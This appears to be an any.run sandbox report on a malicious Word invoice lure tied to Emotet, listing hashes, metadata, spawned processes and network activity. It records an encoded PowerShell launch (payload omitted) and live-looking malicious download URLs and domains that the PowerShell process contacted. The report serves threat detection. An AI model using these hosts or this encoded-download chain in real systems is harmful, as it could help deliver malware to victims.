File name: | INVOICE COPY REQUEST_P_8284.doc |
Full analysis: | https://app.any.run/tasks/6c9d7661-7801-4764-83a7-9ad74259ad6e |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 09, 2019, 13:59:39 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Facilitator, Subject: proactive, Author: Wilfrid Schulist, Keywords: payment, Comments: Supervisor, Template: Normal.dotm, Last Saved By: Addie Simonis, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Oct 8 22:22:00 2019, Last Saved Time/Date: Tue Oct 8 22:22:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 177, Security: 0 |
MD5: | BB2B9E7C852F37FD374CE1877FDD868A |
SHA1: | DFBEE6FD7997F81FDF2718922EC04A13D961B042 |
SHA256: | F8088422B9FCCF20927D24F71BC3379C459DFEBE47930A7191C101DC5765EB9A |
SSDEEP: | 6144:S57I3olKUzSMnLx3FHBXyaBiG6EUqnUPse:S57I3o8UGMt3Fh7BiG6PXPs |
Extension | Description |
---|---|
.doc | Microsoft Word document (54.2) |
.doc | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
CompObjUserTypeLen: | 32 |
Manager: | Simonis |
HeadingPairs: | - |
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 206 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | Spencer - Herzog |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 177 |
Words: | 30 |
Pages: | 1 |
ModifyDate: | 2019:10:08 21:22:00 |
CreateDate: | 2019:10:08 21:22:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | Addie Simonis |
Template: | Normal.dotm |
Comments: | Supervisor |
Keywords: | payment |
Author: | Wilfrid Schulist |
Subject: | proactive |
Title: | Facilitator |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2968 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\INVOICE COPY REQUEST_P_8284.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2304 | powershell -enco [base64-encoded command omitted] | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3420 | powershell -enco [base64-encoded command omitted] | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR1360.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2304 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\A7L2H3M0DYURGT9XFS5H.temp | — | |
MD5:— | SHA256:— | |||
3420 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5OMWSQOQ2FDE9UQ0JW41.temp | — | |
MD5:— | SHA256:— | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:A6EED262238EEEE830BEFA6550BA84C0 | SHA256:FB3DBC9E040239FE43CDCB1A25D2586A6A048B89A6582A81EA412AE900EEECBF | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CC17530A.wmf | wmf | |
MD5:CB888DEC4BAE01A40AC25D60192AD8CF | SHA256:22ED1331BA33C2CFC10B6A7E20E7A607A806C85F21BB4820302A498D4AA37214 | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\578DBF6.wmf | wmf | |
MD5:2D0A3959940CDA264D880FDBAF145585 | SHA256:75F604C7F17A8EC1EA7C747E41A254B96E1B0B26D7FF3887017AAEE68D8B9349 | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\37BD6E00.wmf | wmf | |
MD5:089B7464DB93FC0E3C76863ABD6DADB4 | SHA256:34A6743403F07ECC24EB89572990F6B375A83ADCB6D77F354CEB7D7BC5C75873 | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8BD05DA2.wmf | wmf | |
MD5:997EC56D440CB5472430077CFA96E9CE | SHA256:C2A0A35829A70AC9EE29EFC6AF3BDCC0E593FC185020D9F782C69074FBFDDBCD | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\43BF0374.wmf | wmf | |
MD5:9B7D75AFA166F59B75A03F23425D1AB0 | SHA256:B930C6FFBFB0CFB5FDE8FE96E3B5B727C9C198CE3A4EDDD878C1261FE1DA7D08 | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E26764E5.wmf | wmf | |
MD5:D0C3BAC403C5171B0DEA44B8CC01EB39 | SHA256:8A2A70C4D5A71C0C47FC9F96C4524F1DA53B97083398D9B86D7F45CDDCD085CD |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2304 | powershell.exe | GET | 404 | 160.153.128.9:80 | http://www.diamondegy.com/wp-includes/wuksdgxg9n-pcm-6870/ | US | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2304 | powershell.exe | 45.56.100.50:80 | www.evextensions.com | Linode, LLC | US | unknown |
2304 | powershell.exe | 107.180.41.41:443 | www.xuperweb.com | GoDaddy.com, LLC | US | unknown |
2304 | powershell.exe | 160.153.128.9:80 | www.diamondegy.com | GoDaddy.com, LLC | US | malicious |
2304 | powershell.exe | 198.71.233.68:443 | quantumneurology.com | GoDaddy.com, LLC | US | suspicious |
2304 | powershell.exe | 107.180.2.5:443 | www.openwaterswimli.com | GoDaddy.com, LLC | US | unknown |
Domain | IP | Reputation |
---|---|---|
quantumneurology.com | — | suspicious |
www.xuperweb.com | — | unknown |
www.openwaterswimli.com | — | unknown |
www.evextensions.com | — | unknown |
www.diamondegy.com | — | malicious |